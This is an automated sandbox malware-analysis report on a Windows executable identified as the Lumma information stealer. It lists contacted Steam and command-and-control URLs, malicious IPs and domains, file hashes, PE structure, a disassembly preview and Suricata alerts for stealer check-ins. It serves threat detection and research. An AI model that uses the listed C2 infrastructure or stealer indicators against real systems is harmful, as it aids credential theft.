https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/discussions/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/stats/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stamppreewntnq.shop/	BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/apiK	BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1754207920.0000000002889000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/	BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/workshop/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.a	BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/p	BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/le	BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/	BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=	BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	BitLockerToGo.exe, 00000002.00000003.1748418926.00000000027F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/apiz;	BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/account/cookiepreferences/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	nippydxmnwquo.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
172.67.206.204	sergei-esenin.com	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532747
Start date and time:	2024-10-13 21:33:22 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@11/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 15 Number of non-executed functions: 93
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, PID 4788 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Simulations

Behavior and APIs

Time	Type	Description
15:34:53	API Interceptor	5x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	AeYgxx6XFk.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	kitaygorod.top/EternalProcessorMultiwordpressdleTempcentraltemporary.php
	http://host.cloudsonicwave.com	Get hash	malicious	Unknown	Browse	host.cloudsonicwave.com/favicon.ico
	alWUxZvrvU.exe	Get hash	malicious	FormBook	Browse	www.avantfize.shop/q8x9/
	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/fxts/
	RRjzYVukzs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exe	Get hash	malicious	FormBook	Browse	www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	http://embittermentdc.com	Get hash	malicious	Unknown	Browse	embittermentdc.com/favicon.ico
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sergei-esenin.com	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
nippydxmnwquo.shop	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
steamcommunity.com	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe	Get hash	malicious	Vidar, Xmrig	Browse	104.102.49.254
	https://steamcommunlty-gifts.com/s/HRAB	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://steamcommunity-success.com/gift-card/9376695162	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://steamcommunlty-gifts.com/s/HRAB	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://steamcommunity-success.com/gift-card/9376695162	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	https://fexegreuyauja-8124.vercel.app/mixc.html	Get hash	malicious	HTMLPhisher	Browse	172.67.75.166
	https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://onedoc3.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.67.69.226
	http://iglawfirm.com/services/antai-fr/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.iglawfirm.com/services/antai-fr/infospage.php	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://bancolombia-personas-co.glitch.me/	Get hash	malicious	Unknown	Browse	172.67.74.152
	http://bancolombia-seguridad-co.glitch.me/	Get hash	malicious	Unknown	Browse	104.26.12.205
	http://telegiraum.club/	Get hash	malicious	Telegram Phisher	Browse	104.16.124.96
CLOUDFLARENETUS	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	https://fexegreuyauja-8124.vercel.app/mixc.html	Get hash	malicious	HTMLPhisher	Browse	172.67.75.166
	https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://onedoc3.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.67.69.226
	http://iglawfirm.com/services/antai-fr/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.iglawfirm.com/services/antai-fr/infospage.php	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://bancolombia-personas-co.glitch.me/	Get hash	malicious	Unknown	Browse	172.67.74.152
	http://bancolombia-seguridad-co.glitch.me/	Get hash	malicious	Unknown	Browse	104.26.12.205
	http://telegiraum.club/	Get hash	malicious	Telegram Phisher	Browse	104.16.124.96
AKAMAI-ASUS	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://steamcommunityv.com/redeemwalletcode/gift/514590383	Get hash	malicious	Unknown	Browse	88.221.169.65
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe	Get hash	malicious	Vidar, Xmrig	Browse	104.102.49.254
	https://steamcommunlty-gifts.com/s/HRAB	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://steamcommunity-success.com/gift-card/9376695162	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://steamcommunlty-gifts.com/s/HRAB	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://steamcommunity-success.com/gift-card/9376695162	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	https://onedoc3.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.97.3 172.67.206.204

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	2.4637105799688097
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe
File size:	32'150'017 bytes
MD5:	2e1e5df2401546676205befe6668ed88
SHA1:	469e34d2392c6ee4837fbcb15dca74c83b1246cc
SHA256:	15de8f29eaf5dbf78c94318c11f87e519380c66d094966113bb56622faf5152f
SHA512:	aad24d4323d4c1b97f625b3b64ddce346c919a3e66da273a62588d6aa536697cd49359ee59d07c9fb1019242e32c2ac16599a4650ea27ffd5951c57dd6c19095
SSDEEP:	98304:peJXXYAnEqCChDxA2BPrhZ7TRCXCVVae:MPnZW2B1Z3p
TLSH:	69671752FACB89F2DD534571404BA37F17345D058B39CB8BEA18BE6AE8773825C32249
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................G.."...... /............@.................................3C....@................................

File Icon


Icon Hash:	235c6cc4d8ec6d33

Static PE Info

General

Entrypoint:	0x472f20
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	1aae8bf580c846f39c71c05898e57e88

Entrypoint Preview

Instruction
jmp 00007F979123EF40h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007F979121AC06h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007F9791241394h
cld
call 00007F979124042Eh
call 00007F979123F069h
add esp, 08h
ret
jmp 00007F9791241240h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007F9791241241h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa72000	0x44c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab1000	0x2cc4e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa73000	0x3c7b0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9fd340	0xb4	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x47a678	0x47a800	97bcd172c0f6ec390f5dca42fae5a0b8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x47c000	0x57f3f0	0x57f400	a0e2e885cd4858af967b1cf88464684c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9fc000	0x757ec	0x45400	5f9614d555d5924296683dba033a6a4b	False	0.43256783055054154	data	5.600819236562076	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa72000	0x44c	0x600	949efd70052afb4c98edfc9c10218597	False	0.359375	OpenPGP Public Key	3.8776437007407005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xa73000	0x3c7b0	0x3c800	05a5e22f55a90a142185b8272d25c015	False	0.5863733212809917	data	6.688064860400713	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xab0000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xab1000	0x2cc4e	0x2ce00	c90bdfe518fc6b7509a54e4520eedabd	False	0.23658926706128133	data	4.568068647258103	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab12b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m			0.499113475177305
RT_ICON	0xab1718	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m			0.40737704918032785
RT_ICON	0xab20a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m			0.33630393996247654
RT_ICON	0xab3148	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m			0.24304979253112033
RT_ICON	0xab56f0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m			0.19426074633915918
RT_ICON	0xab9918	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m			0.17915896487985214
RT_ICON	0xabeda0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m			0.14326256043725036
RT_ICON	0xac8248	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m			0.10954690642375488
RT_ICON	0xad8a70	0x44ae	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9996018655443066
RT_GROUP_ICON	0xadcf20	0x84	data			0.7272727272727273
RT_VERSION	0xadcfa4	0x584	data	English	United States	0.2726628895184136
RT_MANIFEST	0xadd528	0x726	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4005464480874317

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T21:34:55.399474+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49704	188.114.97.3	443	TCP
2024-10-13T21:34:55.399474+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49704	188.114.97.3	443	TCP
2024-10-13T21:34:55.406570+0200	2055479	ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)	1	192.168.2.8	50841	1.1.1.1	53	UDP
2024-10-13T21:34:55.444032+0200	2055483	ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)	1	192.168.2.8	61114	1.1.1.1	53	UDP
2024-10-13T21:34:55.457364+0200	2055475	ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop)	1	192.168.2.8	59587	1.1.1.1	53	UDP
2024-10-13T21:34:55.470727+0200	2055477	ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop)	1	192.168.2.8	50525	1.1.1.1	53	UDP
2024-10-13T21:34:55.482826+0200	2055480	ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop)	1	192.168.2.8	52207	1.1.1.1	53	UDP
